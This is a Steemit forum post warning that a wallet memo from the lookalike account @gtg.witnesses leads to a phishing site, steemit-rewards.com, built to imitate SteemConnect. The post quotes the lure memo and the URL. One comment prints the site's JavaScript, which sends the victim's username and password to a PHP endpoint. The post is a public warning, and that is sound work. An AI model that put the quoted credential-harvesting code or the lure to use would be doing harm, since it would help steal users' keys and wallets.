URGENT PHISHING LINK ALERT! DO NOT USE THIS SITE OR FOLLOW THE LINK IN THE ENCLOSED MESSAGE APPEARING TO BE FROM @gtg.witness

in #phishing7 years ago (edited)

EMERGENCY PUBLIC SERVICE ANNOUNCEMENT!

I just received this wallet notification. Many reports are coming in that it was widely spammed.

@sircork:
Coin transfer from @gtg.witnesses (0.001 SBD)
[Open your wallet]
Sender: @gtg.witnesses
Amount: 0.001 SBD
Memo: You received a reward in SBD from gtg for your witnesses vote! Claim here: https://steemit-rewards.com/?u=sircork
Time: 2018-02-23T07:31:00

*** @gtg.witnesses is not the same as the real @gtg.witness - Notice it's plural, and that's just extra BS***

THIS IS A PHISHING LINK !!!!

DO NOT FOLLOW THE ABOVE URL !!!

DO NOT USE THE STEEM CONNECT IT SHOWS YOU - ITS NOT STEEMCONNECT AT ALL!!!

DO NOT PUT YOUR KEYS IN THIS WEBSITE!!!!

REPEAT - https://steemit-rewards.com IS A PHISHING SITE AND WILL STEAL YOUR WALLET.

DO NOT VISIT steemit-rewards.com

DO NOT VISIT steemit-rewards.com

YOU WILL DEFINITELY BE ROBBED IF YOU DO.

[Edit/Additional nerd info]

**[-]grey580 (60) · 13 minutes ago**

Very clever.
The whois for that site.
https://whois.icann.org/en/lookup?name=steemit-rewards.com

Whois records name an individual owner and list a free email service address for the bogus address on it.


firedream - Today at 8:18 AM

@SirCork exactly scam...I checked the source code

function red(u, p, m){
window.location = "http:///%22+window.location.hostname+%22/subscribed.php?hash=98ODFHJ23090ujden9oj23dj238032gh2ohjgp108ghuohoefhjnijHH89U&u=%22+u+%22&p=%22+p+%22&status=done";
}

It sends user and pass to a php function and the site is exactly replicating the steemconnect

BE CAREFUL OUT THERE!

DO RESTEEM THIS TO ALL YOUR PEOPLE - HUNDREDS OF WALLETS AFFECTED, REPORTS FILLING MY INBOX LIKE A SLOT MACHINE GOING OFF ON DISCORD BELLS.

IT'S FOOLING PEOPLE, DON'T LET IT!

[-]grey580 (60) · 12 minutes ago
Everyone please go to namesilo. And use their Report Abuse form.
https://www.namesilo.com/report_abuse.php
If we send in enough complaints they might take the domain offline.

@SirCork
Witness #74

Sort:  
Loading...